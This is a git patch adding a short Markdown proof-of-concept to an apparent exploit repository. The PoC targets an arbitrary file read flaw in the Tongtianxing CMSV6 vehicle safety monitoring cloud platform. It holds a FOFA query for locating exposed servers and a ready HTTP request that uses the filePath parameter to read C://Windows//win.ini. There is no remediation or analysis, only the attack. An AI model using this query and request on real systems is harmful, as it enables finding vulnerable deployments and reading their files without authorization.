From e62abef03981bb6f18d0045167de6e545dcc74d3 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 28 Feb 2024 19:13:21 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=B8=BF=E8=BF=90(=E9=80=9A=E5=A4=A9?=
 =?UTF-8?q?=E6=98=9FCMSV6=E8=BD=A6=E8=BD=BD)=E4=B8=BB=E5=8A=A8=E5=AE=89?=
 =?UTF-8?q?=E5=85=A8=E7=9B=91=E6=8E=A7=E4=BA=91=E5=B9=B3=E5=8F=B0=E5=AD=98?=
 =?UTF-8?q?=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...SV6车载)主动安全监控云平台存在任意文件读取漏洞.md | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md

diff --git a/鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md b/鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md
new file mode 100644
index 0000000..95f1556
--- /dev/null
+++ b/鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md
@@ -0,0 +1,17 @@
+## 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞
+
+## fofa
+```
+body="./open/webApi.html"||body="/808gps/"
+```
+
+## poc
+```
+GET /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1
+Host:127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/4c7d4c08-d72f-477b-9604-f9cec433e39c)